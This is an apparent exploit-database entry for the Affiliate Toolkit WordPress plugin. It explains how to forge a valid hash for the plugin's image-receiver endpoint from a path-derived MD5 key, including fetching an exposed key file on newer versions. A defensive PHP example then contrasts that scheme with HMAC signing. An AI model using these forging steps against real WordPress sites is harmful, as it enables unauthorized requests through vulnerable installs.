## https://sploitus.com/exploit?id=WPEX-ID:39ED4934-3D91-4924-8ACC-25759FEF9E81
Send a request to `http://example.com/wp-content/plugins/affiliate-toolkit-starter/tools/atkp_imagereceiver.php?image=$img&hash=$hash`, where `$img` is the base64-encoded URL and `$hash` is computed as follows:

```php
$site_key = md5(__FILE__);
$hash = md5( $image_url . $site_key );
```

`$image_url` is the raw URL, without base64 encoding.

For example, under Docker `__FILE__` could be `/var/www/html/wp-content/plugins/affiliate-toolkit-starter/tools/atkp_imagereceiver.php`; with that path known, the hash can be computed and the request sent successfully.

In versions after 3.3.6, the site key may also be available by fetching `/wp-content/uploads/atkp-imagereceiver-key.php` from the remote site. If it's not present, use the same site key as for earlier versions.
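
For defenders, the path-derived key described above is shown next to a hardened signing scheme (random per-site key, HMAC-SHA256, constant-time comparison). This is an added example, not the plugin's code or its actual fix; every function name and the sample URL are hypothetical, and it assumes the key is stored where it cannot be fetched over HTTP.

```php
<?php
// Added example, not the plugin's code. All function names are hypothetical.

// Pattern described above: the key is a hash of the script's own path,
// so every install at the same path ends up with the same key.
function weak_site_key(string $script_path): string {
    return md5($script_path);
}
function weak_sign(string $image_url, string $site_key): string {
    return md5($image_url . $site_key);
}

// Hardened: 256-bit key from the CSPRNG, generated once per site.
// Assumption: it is stored where it cannot be fetched over HTTP.
function new_site_key(): string {
    return bin2hex(random_bytes(32));
}
function sign_url(string $image_url, string $site_key): string {
    return hash_hmac('sha256', $image_url, $site_key);
}
// Returns the decoded URL if the signature checks out, otherwise null.
function verify_request(string $image_b64, string $hash, string $site_key): ?string {
    $image_url = base64_decode($image_b64, true);   // strict: reject non-base64 input
    if ($image_url === false || $image_url === '') {
        return null;
    }
    // hash_equals compares in constant time
    return hash_equals(sign_url($image_url, $site_key), $hash) ? $image_url : null;
}

// Constructed sample values.
$url  = 'https://images.example.org/product.jpg';
$path = '/var/www/html/wp-content/plugins/affiliate-toolkit-starter/tools/atkp_imagereceiver.php';

// Two separate installs at the same path: identical signatures.
$site_a = weak_sign($url, weak_site_key($path));
$site_b = weak_sign($url, weak_site_key($path));
var_dump($site_a === $site_b);

// Two separate installs with random keys: a signature from one fails on the other.
$key_a = new_site_key();
$key_b = new_site_key();
$sig_a = sign_url($url, $key_a);
var_dump(verify_request(base64_encode($url), $sig_a, $key_a) === $url);
var_dump(verify_request(base64_encode($url), $sig_a, $key_b) === null);
```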